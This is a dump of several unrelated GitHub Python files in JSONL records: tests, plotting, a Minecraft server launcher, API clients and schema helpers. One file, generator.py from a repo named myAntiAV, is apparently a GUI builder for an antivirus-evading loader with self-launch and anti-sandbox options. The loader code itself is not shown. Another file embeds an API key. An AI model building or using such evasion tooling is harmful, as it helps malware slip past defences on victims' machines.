x)\n","repo_name":"minhtriet/knowledge_embed","sub_path":"harmon_net.py","file_name":"harmon_net.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24063231790","text":"import os\ndef rename_files():\n #(1) get file names from a folder\n path = '/Users/kseidl/Documents/Udacity/Python/prank/'\n file_list = os.listdir(path)\n os.chdir(path)\n print(file_list)\n\n #(2) for each file, rename filename\n for file_name in file_list:\n print(\"Old Name -\" +file_name)\n os.rename(file_name, file_name.translate(None, \"0 1 2 3 4 5 6 7 8 9\"))\n print(\"New Name -\" + file_name)\n \nrename_files()\n","repo_name":"KathiSR/LearningPython_Udacity","sub_path":"rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9805047793","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\nif __name__ == \"__main__\":\n params = [0.5, 1, 2, 3]\n x = np.linspace(0, 1, 100)\n f, ax = plt.subplots(len(params), len(params), sharex=True, sharey=True)\n for i in range(4):\n for j in range(4):\n a = params[i]\n b = params[j]\n y = stats.beta(a, b).pdf(x)\n ax[i, j].plot(x, y)\n ax[i, j].plot(\n 0,\n 0,\n label=\"$\\\\alpha$ = {:3.2f}\\n$\\\\beta$ = {:3.2f}\".format(a, b),\n alpha=0,\n )\n ax[i, j].legend(fontsize=12)\n\n ax[3, 0].set_xlabel(\"$\\\\theta$\", fontsize=14)\n ax[0, 0].set_ylabel(\"$p(\\\\theta)$\", fontsize=14)\n plt.show()\n","repo_name":"tinylambda/keep","sub_path":"playground/stats/bayes/bayes_beta.py","file_name":"bayes_beta.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40060120707","text":"from gui import Ui_MainWindow\n\n#导入程序运行必须模块\nimport sys\nimport os\n#PyQt5中使用的基本控件都在PyQt5.QtWidgets模块中\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox\nfrom PyQt5.QtCore import Qt\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.pushButton_select.clicked.connect(self.open_file)\n self.pushButton_generator.clicked.connect(self.generator)\n\n def open_file(self):\n fileName, fileType = QFileDialog.getOpenFileName(\n self, \"选取文件\", os.path.dirname(__file__),\n \"All Files(*);;Text Files(*.txt)\")\n self.lineEdit_file_select.setText(fileName)\n\n def generator(self):\n print(\"i am generator\")\n os.chdir(os.path.dirname(__file__))\n f = open(\"config\", \"w\")\n f.write(self.lineEdit_file_select.text() + \"\\n\")\n if self.checkBox_selflaunch.checkState() == Qt.Checked:\n f.write(\"selflaunch:1\\n\")\n else:\n f.write(\"selflaunch:0\\n\")\n if self.checkBox_antisandbox.checkState() == Qt.Checked:\n f.write(\"antisandbox:1\\n\")\n else:\n f.write(\"antisandbox:0\\n\")\n f.write(self.comboBox_LoadMethed.currentText())\n f.close()\n is32 = \"\"\n if self.checkBox_is32.checkState() == Qt.Checked:\n is32 = \"-m32\"\n os.system(r\"g++ load/{}.cpp {} -mwindows --static -o bin/{}\".format(\n self.comboBox_LoadMethed.currentText(), is32,\n self.comboBox_LoadMethed.currentText()))\n os.system(r\".\\load\\myMiansha.exe\")\n if (os.path.exists(r\"bin/{}.exe\".format(\n self.comboBox_LoadMethed.currentText()))):\n QMessageBox.about(self, \"succeed\", \"已生成在bin目录中\")\n else:\n QMessageBox.about(self, \"Failed\", \"生成错误\")\n\n\nif __name__ == \"__main__\":\n #固定的,PyQt5程序都需要QApplication对象。sys.argv是命令行参数列表,确保程序可以双击运行\n app = QApplication(sys.argv)\n #初始化\n myWin = MyMainForm()\n #将窗口控件显示在屏幕上\n myWin.show()\n #程序运行,sys.exit方法确保程序完整退出。\n sys.exit(app.exec_())","repo_name":"s1vona/myAntiAV","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36200546187","text":"import unittest\nimport tracemalloc\nimport asyncio\nfrom unittest.mock import AsyncMock, patch\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom src.schemas import UserDb, UpdateUserProfileModel\nfrom src.routes.user_profile import profile_router\nfrom src.database.models import User\nfrom src.services.auth import auth_service\nfrom src.conf.config import settings\nfrom datetime import datetime\n\ntracemalloc.start()\n\nclass TestProfileRouter(unittest.TestCase):\n \"\"\"\n Unit tests for the user profile router.\n\n This class contains test cases for the profile router functionality,\n including getting user profiles, updating user profiles, and handling\n various error scenarios.\n \"\"\"\n def setUp(self) -> None:\n \"\"\"\n Set up the test environment before each test case.\n \"\"\"\n self.session = AsyncMock(spec=AsyncSession())\n\n def tearDown(self) -> None:\n \"\"\"\n Clean up the test environment after each test case.\n \"\"\"\n del self.session\n\n async def test_get_user_profile(self):\n \"\"\"\n Test the GET request to retrieve a user profile.\n\n This test case mocks the database interaction and checks if the expected\n user profile data is returned in the response.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_user = UserDb(\n id=1,\n role_id=1,\n first_name=\"John\",\n last_name=\"Doe\",\n created_at=datetime.utcnow(),\n avatar=\"path/to/avatar\",\n username=\"testuser\",\n email=\"test@example.com\",\n )\n mock_db = AsyncMock(spec=AsyncSession())\n mock_db.execute.return_value.scalars().first.return_value = mock_user\n\n with patch(\"src.repository.users.get_user_by_username\", return_value=mock_user):\n response = await self.client.get(\"/profile/testuser\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json(), mock_user.dict())\n\n async def test_get_nonexistent_user_profile(self):\n \"\"\"\n Test the GET request to retrieve a nonexistent user profile.\n\n This test case mocks the database interaction and checks if a 404 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n with patch(\"src.repository.users.get_user_by_username\", return_value=None):\n response = await self.client.get(\"/profile/nonexistentuser\")\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(response.json(), {\"detail\": \"User not found\"})\n\n async def test_get_own_profile_unauthorized(self):\n \"\"\"\n Test the GET request to retrieve the user's own profile when unauthorized.\n\n This test case mocks the authentication service and checks if a 401 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n with patch(\"src.services.auth_service.get_current_user\", return_value=None):\n response = await self.client.get(\"/profile/me/\")\n\n self.assertEqual(response.status_code, 401)\n self.assertEqual(response.json(), {\"detail\": \"Not authenticated\"})\n\n async def test_update_own_profile_invalid_data(self):\n \"\"\"\n Test the PUT request to update the user's own profile with invalid data.\n\n This test case mocks the authentication service and checks if a 401 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_update_data = UpdateUserProfileModel(username=\"newusername\")\n with patch(\"src.services.auth_service.get_current_user\", return_value=None):\n response = await self.client.put(\"/profile/me/\", json=mock_update_data.dict())\n\n self.assertEqual(response.status_code, 401)\n self.assertEqual(response.json(), {\"detail\": \"Not authenticated\"})\n\n async def test_update_user_avatar_invalid_file(self):\n \"\"\"\n Test the PATCH request to update the user's avatar with an invalid file.\n\n This test case mocks the cloudinary upload and user repository functions and\n checks if a 400 response is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n with patch(\"cloudinary.uploader.upload\", side_effect=Exception(\"Invalid file\")), \\\n patch(\"src.repository.users.update_avatar\", return_value=None):\n response = await self.client.patch(\"/profile/avatar\", files={\"file\": (\"test.txt\", b\"invalidfile\")})\n\n self.assertEqual(response.status_code, 400)\n self.assertEqual(response.json(), {\"detail\": \"Invalid file format\"})\n\n async def test_update_password_invalid_token(self):\n \"\"\"\n Test the PATCH request to update the user's password with an invalid token.\n\n This test case mocks the authentication service and checks if a 400 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_new_password_data = {\"new_password\": \"newpass\", \"confirm_password\": \"newpass\", \"token\": \"invalidtoken\"}\n with patch(\"src.services.auth_service.get_email_from_token\", side_effect=Exception(\"Invalid token\")):\n response = await self.client.patch(\"/profile/update-password\", json=mock_new_password_data)\n\n self.assertEqual(response.status_code, 400)\n self.assertEqual(response.json(), {\"detail\": \"Invalid token\"})\n\n async def test_update_email_user_not_found(self):\n \"\"\"\n Test the PATCH request to update the user's email when the user is not found.\n\n This test case mocks the authentication service and user repository functions\n and checks if a 404 response is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_new_email_data = {\"new_email\": \"newemail@example.com\", \"token\": \"mocktoken\"}\n with patch(\"src.services.auth_service.get_email_from_token\", return_value=\"test@example.com\"), \\\n patch(\"src.repository.users.get_user_by_email\", return_value=None):\n response = await self.client.patch(\"/profile/update-email\", json=mock_new_email_data)\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(response.json(), {\"detail\": \"User not found\"})\n\n async def test_update_user_role_invalid_role(self):\n \"\"\"\n Test the PUT request to update the user's role with an invalid role.\n\n This test case mocks the role repository function and checks if a 404 response\n is returned with the appropriate detail.\n\n Raises:\n - AssertionError: If the response status code or content is unexpected.\n \"\"\"\n mock_role_data = {\"role_id\": 99, \"username\": \"testuser\"}\n with patch(\"src.repository.roles.get_role\", return_value=None):\n response = await self.client.put(\"/profile/role\", data=mock_role_data)\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(response.json(), {\"detail\": \"Role not found\"})\n\nif __name__ == \"__main__\":\n asyncio.run(unittest.main())","repo_name":"GkiriChen/test_proect_14_2_web","sub_path":"tests/test_user_profile.py","file_name":"test_user_profile.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10403634666","text":"import logging\nfrom flask import jsonify\nfrom bank_api.database import db\nfrom bank_api.models.user import User\nfrom flask_restful import Resource\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\n\nHOME_ENDPOINT = \"/home\"\nlogger = logging.getLogger(__name__)\n\nclass HomeResource(Resource):\n @jwt_required()\n def get(self):\n username = get_jwt_identity()\n user = db.one_or_404(\n db.select(User).filter_by(username = username),\n description=f\"No user named '{username}'\")\n user_dict = user.__dict__\n user_dict.pop('_sa_instance_state')\n user_dict.pop('id')\n user_dict.pop('password')\n user_dict.pop('code')\n user_dict['birthday'] = user_dict['birthday'].strftime(\"%Y-%m-%d\")\n #print(user_dict)\n return jsonify(user_dict)\n","repo_name":"aolguin89/banking-api","sub_path":"bank_api/resources/home_resource.py","file_name":"home_resource.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23110621601","text":"from argparse import ArgumentParser\nfrom common.util import load_hyperparams, merge_dict, one_hot_encode\nimport numpy as np\nimport os\nfrom tensorflow.contrib import learn\nfrom text_classification_benchmarks.data_loader import clean_data, load_data, remove_classes_with_too_few_examples\nfrom text_classification_benchmarks.word_cnn.model_setup import TextCNN\nfrom text_classification_benchmarks.word_cnn.util import preprocess, save_eval_to_csv, test, train\n\n\ndef run(constant_overwrites):\n config_path = os.path.join(os.path.dirname(__file__), 'hyperparams.yml')\n constants = merge_dict(load_hyperparams(config_path), constant_overwrites)\n train_df, val_df, test_df, classes = load_data(dirname=constants['data_dir'])\n train_df = remove_classes_with_too_few_examples(clean_data(train_df))\n val_df = remove_classes_with_too_few_examples(clean_data(val_df))\n n_classes = len(classes)\n batch_size = constants['batch_size']\n allow_soft_placement = constants['allow_soft_placement']\n log_device_placement = constants['log_device_placement']\n if constants['test']:\n print('\\nTesting...')\n x_raw = val_df.utterance.values\n checkpoint_dir = constants['checkpoint_dir']\n vocab_path = os.path.join(checkpoint_dir, '..', 'vocab')\n vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\n x_test = np.array(list(vocab_processor.transform(x_raw)))\n # y_test = one_hot_encode(val_df.label.values, n_classes)\n y_test = val_df.label.values\n preds = test(x_test, batch_size, checkpoint_dir, allow_soft_placement, log_device_placement, y_test)\n save_eval_to_csv(x_raw, preds, checkpoint_dir)\n else:\n print('\\nTraining...')\n x_train, y_train, x_val, y_val, vocab_processor = preprocess(train_df, val_df, n_classes)\n # model = TextCNN(seq_len=x_train.shape[1], n_classes=y_train.shape[1],\n # vocab_size=len(vocab_processor.vocabulary_),\n # embed_size=constants['embed_size'],\n # filter_sizes=constants['filter_sizes'],\n # n_filters=constants['n_filters'],\n # l2_reg_lambda=constants['l2_reg_lambda'])\n train(x_train, y_train, x_val, y_val, vocab_processor, model=None,\n learning_rate=constants['learning_rate'],\n n_checkpoints=constants['n_checkpoints'],\n keep_prob=constants['keep_prob'],\n batch_size=batch_size,\n n_epochs=constants['n_epochs'],\n evaluate_every=constants['evaluate_every'],\n checkpoint_every=constants['checkpoint_every'],\n allow_soft_placement=allow_soft_placement,\n log_device_placement=log_device_placement,\n constants=constants)\n\n\nif __name__ == '__main__':\n # read args\n parser = ArgumentParser(description='Run Word-CNN Classifier')\n parser.add_argument('--epochs', dest='n_epochs', type=int, help='number epochs')\n parser.add_argument('--batch-size', dest='batch_size', type=int, help='batch size')\n parser.add_argument('--embedding-size', dest='embed_size', type=int, help='embedding size')\n parser.add_argument('--filter-sizes', dest='filter_sizes', type=str, help='comma-separated filter sizes')\n parser.add_argument('--learning-rate', dest='learning_rate', type=float, help='learning rate')\n parser.add_argument('--data-dir', dest='data_dir', type=str, help='relative path to data')\n parser.add_argument('--checkpoint-dir', dest='checkpoint_dir', type=str,\n help='checkpoint directory from training run')\n parser.add_argument('--word2vec-filename', dest='word2vec_filename', type=str,\n help='path to word2vec embeddings file')\n parser.add_argument('--test', dest='test',\n help='run eval on the test dataset using a fixed checkpoint', action='store_true')\n parser.set_defaults(test=False)\n args = parser.parse_args()\n args_dict = vars(args)\n if args_dict['filter_sizes']:\n args_dict['filter_sizes'] = [x for x in args_dict['filter_sizes'].split(',')]\n\n run(args_dict)\n","repo_name":"markmo/dltemplate","sub_path":"src/text_classification_benchmarks/word_cnn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"29501606911","text":"#!/usr/bin/env python3\n\nAPI=\"qervegelclrmbvcdhpvvmebpnyxgjknysayt\"\nHOST=\"172.31.255.30\"\nPORT=3324\n\nimport LedgerCompliance.client\nimport string\nimport random\nimport time\n\ncli=LedgerCompliance.client.Client(API, HOST, PORT)\ncli.connect()\n\ndef get_random_string(length):\n letters = string.ascii_lowercase\n ret = ''.join(random.choice(letters) for i in range(length))\n return ret\n\nKEY=\"LC_history\".encode('ascii')\nfor i in range(0,10):\n\tcli.set(KEY, get_random_string(16).encode('ascii'))\n\nret=cli.history(KEY)\nfor h in ret:\n\tprint(\"{:d}: {:s}\".format(h.index, h.value.decode('ascii')))\n","repo_name":"vchain-us/ledger-compliance-py","sub_path":"examples/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40453110787","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport pickle, os\nimport numpy as np\nfrom Naked.toolshed.shell import muterun_js\nimport sys\nimport requests, random\nimport tensorflow as tf\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\ndef save_model(filename, model):\n pickle.dump(model, open(filename, 'wb'))\n\ndef load_model(filename):\n return pickle.load(open(filename, 'rb'))\n\n\ndef get_score(ip):\n url = \"https://ipqualityscore.com/api/json/ip/F5FEG8NGn0stGDfizWPf7ylxu3iNqnX4/\" + ip\n response = requests.get(url).json()\n # print(response)\n return response['fraud_score']\n\n\ndef get_inputs(path, file_name, ip):\n os.chdir(path)\n file = os.path.join(path, file_name)\n x = file_name + ' ' + ip\n output = muterun_js(x)\n s = output.stdout\n s = str(s).strip()[2:-3]\n print(s)\n return s\n\n\ndef retrain(ip_list):\n\n model_folder = \"../ai-server/models\"\n\n model_names = os.listdir(model_folder)\n models = []\n\n for m in model_names:\n model_path = os.path.join(model_folder, m)\n model = load_model(model_path)\n models.append(model)\n\n\n curr_dir = os.getcwd()\n os.chdir(curr_dir)\n inp_folder = \"../whois\"\n file_name = \"getInspectorScores.js\"\n\n\n x_train, y_train = [], []\n\n random.shuffle(ip_list)\n\n for ip in ip_list[:3]:\n inputs = get_inputs(inp_folder, file_name, ip).split()\n\n x = list(map(float, inputs))\n # print(x)\n try:\n y = int(get_score(ip))\n except:\n continue\n\n y = np.array(y)\n\n x_train.append(x)\n y_train.append(y)\n\n\n x_train, y_train = np.array(x_train), np.array(y_train)\n # print(x_train.shape, y_train.shape)\n\n for model in models:\n model.fit(x_train, y_train, batch_size=10, nb_epoch=30)\n\n print(\"Model Trained!\")","repo_name":"dyingg/rk311_infowise-pub-","sub_path":"src/main/scraper-module/AI_retrain.py","file_name":"AI_retrain.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36243271462","text":"from __future__ import absolute_import\n\nfrom requests.exceptions import HTTPError\nfrom sentry.http import build_session\nfrom sentry.utils.http import absolute_uri\n\nfrom sentry_plugins.exceptions import ApiError\n\n# https://v2.developer.pagerduty.com/docs/events-api\nINTEGRATION_API_URL = \\\n 'https://events.pagerduty.com/generic/2010-04-15/create_event.json'\n\n\nclass PagerDutyClient(object):\n client = 'sentry'\n\n def __init__(self, service_key=None):\n self.service_key = service_key\n\n def request(self, data):\n payload = {\n 'service_key': self.service_key,\n }\n payload.update(data)\n\n session = build_session()\n try:\n resp = session.post(\n url=INTEGRATION_API_URL,\n json=payload,\n allow_redirects=False,\n )\n resp.raise_for_status()\n except HTTPError as e:\n raise ApiError.from_response(e.response)\n return resp.json()\n\n def trigger_incident(self, description, event_type, details, incident_key,\n client=None, client_url=None, contexts=None):\n return self.request({\n 'event_type': event_type,\n 'description': description,\n 'details': details,\n 'incident_key': incident_key,\n 'client': client or self.client,\n 'client_url': client_url or absolute_uri(),\n 'contexts': contexts,\n })\n","repo_name":"Mattlk13/sentry","sub_path":"src/sentry_plugins/pagerduty/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37084620241","text":"import cv2\nimport os\nimport numpy as np\n\ndef heatmap_percentage(image_path, lower_threshold, upper_threshold):\n image = cv2.imread(image_path)\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv_image, lower_threshold, upper_threshold)\n heatmap_pixels = np.count_nonzero(mask)\n\n total_pixels = image.shape[0] * image.shape[1]\n percentage = (heatmap_pixels / total_pixels) * 100\n\n return percentage\n\ndef max_heatmap_coordinates(image_path, lower_threshold, upper_threshold):\n image = cv2.imread(image_path)\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv_image, lower_threshold, upper_threshold)\n max_intensity = np.max(mask)\n max_coordinates = np.argwhere(mask == max_intensity)\n\n return max_coordinates\n\nroot_directory = './Results'\n\nred_lower_threshold = np.array([0, 70, 150])\nred_upper_threshold = np.array([10, 255, 255])\n\nyellow_lower_threshold = np.array([20, 100, 150])\nyellow_upper_threshold = np.array([35, 255, 255])\n\ngreen_lower_threshold = np.array([60, 90, 120])\ngreen_upper_threshold = np.array([80, 255, 255])\n\nfor directory, _, files in os.walk(root_directory):\n for filename in os.listdir(directory):\n if filename.endswith(\".jpg\") or filename.endswith(\".png\"):\n image_path = os.path.join(directory, filename)\n\n red_percentage = heatmap_percentage(image_path, red_lower_threshold, red_upper_threshold)\n yellow_percentage = heatmap_percentage(image_path, yellow_lower_threshold, yellow_upper_threshold)\n green_percentage = heatmap_percentage(image_path, green_lower_threshold, green_upper_threshold)\n\n print(f\"Percentage of heatmap coverage in {directory}/{filename}:\")\n print(f\" Red: {red_percentage:.2f}%\")\n print(f\" Yellow: {yellow_percentage:.2f}%\")\n print(f\" Green: {green_percentage:.2f}%\")\n\n for filename in os.listdir(directory):\n if filename.endswith(\".jpg\") or filename.endswith(\".png\"):\n image_path = os.path.join(directory, filename)\n\n red_coordinates = max_heatmap_coordinates(image_path, red_lower_threshold, red_upper_threshold)\n yellow_coordinates = max_heatmap_coordinates(image_path, yellow_lower_threshold, yellow_upper_threshold)\n green_coordinates = max_heatmap_coordinates(image_path, green_lower_threshold, green_upper_threshold)\n\n print(f\"Coordinates of most intense heatmap colors in {directory}/{filename}:\")\n print(f\" Red: {red_coordinates}\")\n print(f\" Yellow: {yellow_coordinates}\")\n print(f\" Green: {green_coordinates}\")\n","repo_name":"polo-sec/heatmap_image_density_analyser","sub_path":"heatmap_image_density_analyser.py","file_name":"heatmap_image_density_analyser.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74493555254","text":"import sys\nif sys.version_info.major < 3 or sys.version_info.minor < 10:\n raise Exception(\"Python Version Out Of Date! Minimum Required: 3.10.0\")\n\nimport argparse\nimport asyncio\nimport signal\nimport traceback\n\nfrom obsidian.server import Server\nfrom obsidian.log import Logger\n\n\nasync def main():\n # Initiate Argument Parser\n parser = argparse.ArgumentParser(description=\"Project Obsidian - Open Source Minecraft Classic Server Reverse Engineer And Reimplementation Project\")\n # parser.add_argument('-x', \"--TEMPLATE\", type=int, nargs='?', help=\"TEMPLATE\", default=TEMPLATE)\n parser.add_argument('-a', \"--address\", type=str, nargs='?', help=\"The Address The Minecraft Server Would Bind To.\", default=\"0.0.0.0\")\n parser.add_argument('-p', \"--port\", type=int, nargs='?', help=\"The Port The Minecraft Server Would Bind To.\", default=25565)\n parser.add_argument('-n', \"--name\", type=str, nargs='?', help=\"The Name Of The Minecraft Server\", default=\"Minecraft Server\")\n parser.add_argument('-m', \"--motd\", type=str, nargs='?', help=\"The MOTD Of The Minecraft Server\", default=\"Python Server Implementation\")\n parser.add_argument('-d', \"--debug\", help=\"Enable Debug Logging\", action=\"store_true\")\n parser.add_argument('-v', \"--verbose\", help=\"Increase Debug Output Verbosity\", action=\"store_true\")\n parser.add_argument('-q', \"--quiet\", help=\"Disabled Logging To File\", action=\"store_true\")\n parser.add_argument('-s', \"--server\", help=\"Auto-Denys Confirmation Dialogs\", action=\"store_true\")\n parser.add_argument('-nc', \"--no-color\", help=\"Disable Color While Logging\", action=\"store_true\")\n args = parser.parse_args()\n\n # Set Logging Levels\n Logger.DEBUG = args.debug\n Logger.VERBOSE = args.verbose\n Logger.SERVER_MODE = args.server\n Logger.COLOR = not args.no_color\n\n # Set Up Logging File\n if not args.quiet:\n Logger.setupLogFile()\n\n # Create and Init Main Server\n server = Server(args.address, args.port, args.name, args.motd, color=True)\n await server.init()\n asyncio.create_task(server.run())\n\n # Capture and Handle Crl-C\n signal.signal(\n signal.SIGINT,\n server.asyncStop # Use this function to run async stop from outside async\n )\n\n # Capture SIGTERM and handle it\n if hasattr(signal, \"SIGTERM\"):\n signal.signal(\n signal.SIGTERM,\n server.asyncStop # Use this function to run async stop from outside async\n )\n\n # Capture SIGQUIT and handle it\n if hasattr(signal, \"SIGQUIT\"):\n signal.signal(\n signal.SIGQUIT,\n server.asyncStop # Use this function to run async stop from outside async\n )\n\n # Busy Operation To Keep Main Thread Alive\n # In the future, this would be dominated by a console thread\n while True:\n await asyncio.sleep(1)\n\n\n# Make sure main gets asynced when run\nif __name__ == \"__main__\":\n try:\n asyncio.run(main())\n except Exception as e:\n Logger.fatal(f\"Unhandled Server Exception - {type(e).__name__}: {e}\", module=\"main\", printTb=False)\n traceback.print_exc()\n","repo_name":"EdwardJXLi/ProjectObsidian","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"42119894052","text":"# -*- coding: utf-8 -*-\n\"\"\"Module compliance_suite.functions.schema.py\n\nFunctions to create dynamic JSON schemas according to test case. Each function\nin this module should write a temporary JSON schema file that is used in the \nvalidation section of API testing and return its filename\n\"\"\"\n\nimport compliance_suite.config.constants as c\nimport compliance_suite.schema_validator as sv\nimport json\nimport os\n\ndef render_and_write_temp_schema(output_filename, template, replace_l):\n \"\"\"Write a temporary schema file\n \n Renders a temporary schema file from a template. Each element in the \n replacement list indicates a string to replace in the template file, as\n well as what to replace it with\n\n Arguments:\n output_filename (str): output file path\n template (str): JSON schema template filename\n replace_l (list): replacement list\n \"\"\"\n\n # open the template schema\n schema_dir = os.path.dirname(sv.__file__) \\\n + \"/\" + c.SCHEMA_RELATIVE_DIR\n template_file = schema_dir + \"/\" + template\n json = open(template_file, \"r\").read()\n\n # for each item in the replacement list, replace the placeholder text\n # in the template, with the true value to be output to the temporary\n # schema\n for replace in replace_l:\n json = json.replace(replace[0], replace[1])\n\n # write the temporary schema file\n out_path = schema_dir + \"/\" + output_filename\n open(out_path, \"w\").write(json)\n\ndef render_endpoint_object_and_array(obj_filename, obj_template, obj_replace_l,\n arr_filename, arr_template, arr_replace_l, value, full=False):\n \"\"\"Render a temporary schema object, and an array full of temp objects\n\n Arguments:\n obj_filename (str): filename for object\n obj_template (str): JSON schema template file for object\n obj_replace_l (list): replacement list for object\n arr_filename (str): filename for array\n arr_template (str): JSON schema template file for array\n arr_replace_l (list): replacement list for array\n value (str): value to differentiate temp file\n full (bool): if full, set minItems to 1 for the array schema\n \"\"\"\n \n # render the object schema\n render_and_write_temp_schema(obj_filename, obj_template, obj_replace_l)\n\n if full:\n arr_replace_l.append(['\"minItems\": 0', '\"minItems\": 1'])\n\n # render the array schema\n render_and_write_temp_schema(arr_filename, arr_template, arr_replace_l)\n\ndef schema_require_matching_id(runner, node, params):\n \"\"\"Generate schema that requires request id to match response id\n\n Arguments:\n runner (Runner): reference to Runner object\n node (Node): reference to Node object\n params (dict): test case parameters\n \n Returns:\n (str): file path for temporary schema\n \"\"\"\n\n template = \"rnaget-reqid-template.json\"\n schemas_by_obj_type = {\n \"projects\": \"rnaget-project.json\",\n \"studies\": \"rnaget-study.json\",\n \"expressions\": \"rnaget-expression.json\",\n \"continuous\": \"rnaget-continuous.json\"\n }\n\n obj_type = node.kwargs[\"obj_type\"]\n obj_id = node.kwargs[\"obj_instance\"][\"id\"]\n output_filename = \"temp.\" + obj_type + \".\" + obj_id + \".reqid.json\"\n\n replace_l = [\n [\"VAR_FILENAME\", output_filename],\n [\"VAR_REF\", schemas_by_obj_type[obj_type]],\n [\"VAR_ID\", obj_id]\n ]\n render_and_write_temp_schema(output_filename, template, replace_l)\n return output_filename\n\ndef schema_require_matching_search_params(runner, node, params, full=True):\n \"\"\"Generate schema requiring matching search params and response params\n\n Arguments:\n runner (Runner): reference to Runner object\n node (Node): reference to Node object\n params (dict): test case parameters\n full (bool): if true, create array schema requiring at least 1 element\n \n Returns:\n (str): file path for temporary schema\n \"\"\"\n\n schemas_by_obj_type = {\n \"projects\": \"rnaget-project.json\",\n \"studies\": \"rnaget-study.json\",\n \"expressions\": \"rnaget-ticket.json\",\n \"continuous\": \"rnaget-ticket.json\"\n }\n array_or_single_by_obj_type = {\n \"projects\": \"array\",\n \"studies\": \"array\",\n \"expressions\": \"single\",\n \"continuous\": \"single\"\n }\n\n obj_type = node.kwargs[\"obj_type\"]\n obj_id = node.kwargs[\"obj_instance\"][\"id\"]\n\n obj_template = \"rnaget-reqsearchparams-template.json\"\n arr_template = \"rnaget-reqsearchparams-array-template.json\"\n obj_filename = \"temp.\" + obj_type + \".\" + obj_id + \".reqsearchparams.json\"\n arr_filename = \"temp.\" + obj_type + \".\" + obj_id + \\\n \".reqsearchparams.array.json\"\n\n # format search parameters as JSON schema that can be subbed into the file\n params_json_schema = []\n for param_key in params.keys():\n if param_key != \"tags\":\n property_key = \"fileType\" if param_key == \"format\" else param_key\n properties = {\n \"type\": \"string\",\n \"enum\": [params[param_key]]\n }\n\n params_json_schema.append('\"%s\": %s' % (\n property_key, json.dumps(properties)))\n\n obj_replace_l = [\n [\"VAR_FILENAME\", obj_filename],\n [\"VAR_REF\", schemas_by_obj_type[obj_type]],\n ['\"VAR_SEARCH_PARAMS\": {}', \",\".join(params_json_schema)]\n ]\n arr_replace_l = [\n [\"VAR_ARRAY_FILENAME\", arr_filename],\n [\"VAR_SINGLE_FILENAME\", obj_filename]\n ]\n value = \"1\"\n\n render_endpoint_object_and_array(obj_filename, obj_template, obj_replace_l,\n arr_filename, arr_template, arr_replace_l, value, full=full)\n\n ret = arr_filename\n if array_or_single_by_obj_type[obj_type] == \"single\":\n ret = obj_filename\n \n return ret\n\ndef schema_require_matching_search_params_allow_empty(runner, node, params):\n \"\"\"Generate schema requiring matching params, allow empty arrays\n\n Arguments:\n runner (Runner): reference to Runner object\n node (Node): reference to Node object\n params (dict): test case parameters\n \n Returns:\n (str): file path for temporary schema\n \"\"\"\n\n return schema_require_matching_search_params(runner, node, params,\n 